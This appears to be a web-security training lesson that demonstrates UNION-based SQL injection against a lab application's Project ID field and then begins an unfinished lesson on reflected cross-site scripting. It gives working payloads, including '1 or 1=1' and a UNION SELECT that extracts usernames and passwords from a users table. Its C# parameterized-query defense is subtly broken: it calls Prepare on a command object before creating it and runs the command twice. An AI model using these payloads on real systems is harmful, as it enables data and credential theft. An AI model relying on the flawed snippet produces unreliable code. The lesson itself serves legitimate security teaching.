SQL Injection
UNION-Based Injection
UNION
is an operator in SQL which allows combining result-sets of two or more SELECT
statements. It is commonly used in SQL injection attacks to extract information from the database if the SELECT
statement is being used in the query.
The following query returns a single row result:
SELECT column1 FROM table1
This next query will combine the second query result which will return two rows:
SELECT column1 FROM table1 UNION SELECT 1
In this case, the last row will show 1
as the result since we are just selecting a constant value. You can substitute the 1 with a column from any other table.
Note: In order for the UNION
to function correctly, the following must be true.
- The
SELECT
statement within theUNION
must have return the same number of columns as the firstSELECT
statement. - The columns must have similar data types in the same order.
Reconnaissance
Click on the Projects menu to see a list of existing company projects. You will see that each project contains the name and description of the project. At the top right of the menu bar, enter a project ID from the list in the text box and select View Project. This will show full details of the project on a single page.
Enter the following payload into the Enter Project ID field and select View Project.
1 or 1=1
we will get all projects which means this field is vulnerable to injection. The input above creates the following query:
SELECT * FROM projects WHERE id = 1 or 1=1
We can use the UNION
operator to extract some additional database information so that it will be returned with the project data.
Weaponization and Delivery
As mentioned, the SELECT
statement within UNION
must have the same number of columns as the first SELECT
statement. We need to find out how many columns are being requested in the original statement.
Increment the number of columns in the UNION SELECT
statement. For example:
1 UNION SELECT 1
You should receive a 500
response back from the server due to the mismatched column count.
Continue to increment the number of columns in the UNION SELECT
.
1 UNION SELECT 1, 2
And then:
1 UNION SELECT 1, 2, 3
Repeat until you no longer receive the Internal Server Error..
Exploitation
There are seven columns in the original SELECT statement, so the working payload is:
1 UNION SELECT 1, 2, 3, 4, 5, 6, 7
Instead of incrementing starting from 1, you may have also noticed that there are 7 fields for each project shown on the page (ID, Project Name, Description, Start Date, End Date, Project Type, Owner), so you could have started right from 7.
Now that you have the number of columns you can start extracting other information from the database.
For example, there is a global variable named @@version
which will return SQL server version number. Enter the following payload into the Enter Project ID field:
1 UNION SELECT @@version, 2, 3, 4, 5, 6, 7
The SQL server version number will be displayed as the project ID column value.
Now, try to extract some information about the users. The solution is on the next page.
Exploitation
To retrieve user information, you could use the following as the value as the Project ID:
1 UNION SELECT user_id, user_name, password, 4, 5, 6, 7 FROM users
Observe that you need both the column names and the table name in order to perform the UNION
injection. There are a couple different ways to retrieve them:
- Make an educated guess: Start with commonly used names for tables and columns.
- SQL Injection: For harder to guess table and column names, you can used the techniques described in SQL Injection: Part 2 to iterate through and extract database information.
Defense
The SQL injection techniques used in this lesson are more advanced and nuanced for an attacker. However, the outcome can be just as devastating since they can still extract data from the database.
To protect against these SQL injection attacks:
- Validate all input data, ideally with an allowlist on the server side.
- Always enforce least privilege, giving the least privilege necessary to complete a task; ensure the MySQL connection is at the minimum privilege to execute the query.
- Use parameterized queries for SQL statements.
C#
string sql = "SELECT user_id FROM users WHERE user_name = @username AND password = @password;";
cmd.Prepare();
MySqlCommand cmd = new MySqlCommand(sql, conn);
cmd.Parameters.Add("@username", username);
cmd.Parameters.Add("@password", password);
cmd.Prepare();
cmd.ExecuteNonQuery();
MySqlDataReader rdr = cmd.ExecuteReader();
Reflected Cross-Site Scripting (XSS)
Introduction
In this lesson we will look at how to exploit and remediate a Reflected Cross-Site Scripting vulnerability. A Reflected Cross-Site Scripting vulnerability occurs when data from a user's request is returned in a page context where it is treated as code and executed in the user's browser.
Cross-Site Scripting is a type of code injection vulnerability, where data is accidentally treated as code by the browser. To exploit it, we have to find a part of the application that will reflect user input into the HTML output. To fix a Cross-Site Scripting vulnerability you must find the location in the code where the attacker controlled data is being mixed with the HTML, determine the context of that portion of the HTML, and apply the proper defense for that HTML context.
Security folks will often refer to the three main types of Cross-Site Scripting as: Reflected, Stored and DOM Based. Another way to label these vulnerabilities is using the location where the data is mixed with code, which would give us Client Cross-Site Scripting or Server Cross-Site Scripting. The vulnerability in this application is a Reflected Server Cross-Site Scripting vulnerability because the attacker controlled data will be mixed with the HTML on the server before sending it to the browser.
Let's take a look at how we can exploit the security bug in this application.
Comments
Post a Comment